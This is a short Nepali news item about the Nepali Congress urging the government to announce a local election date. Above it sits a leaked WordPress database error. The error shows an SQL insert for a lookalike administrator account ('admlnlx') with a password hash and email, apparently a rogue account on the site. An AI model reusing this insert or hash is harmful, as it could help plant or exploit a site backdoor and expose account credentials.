WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BumGpQO0OdbhO.cK9D1MIsq1YSE2dH0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 23:05:47', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस १० –
स्थानीय निकायको चुनावको मितिको तत्काल घोषणा गर्न नेपाली कांग्रेसले सरकारसँग आग्रह गर्ने भएको छ ।
आइतबार बिहान बसेको कांग्रेस पदाधिकारीको बैठकले पुरानै संरचना अनुसार स्थानीय निकायको चुनाव गर्न उपयुक्त हुने ठहर गर्दै चुनावको मिति तत्काल घोषणा गर्न सरकारसँग आग्रह गर्ने निर्णय भएको नेता रामचन्द्र पौडेलले बताउनुभयो ।
संविधान कार्यान्वयका लागि चुनाव अपरिहार्य रहेकाले चाँडो मिति घोषणा गरेर चुनावको वातावरण बनाउनु पर्नेमा कांग्रेसले जोड दिएको छ ।
संसदीय दलको कार्यालय सिंहदरबारमा बसेको बैठकमा महामन्त्री शशांक कोइरालाले ठूलो दलको नाताले अहिलेको राजनीतिक गतिरोध अन्त्यका लागि सभापति शेरबहादुर देउवाले सक्रियता बढाउनु पर्नेमा जोड दिनुभयो । पदाधिकारीको बैठक सोमबार पनि बस्नेछ ।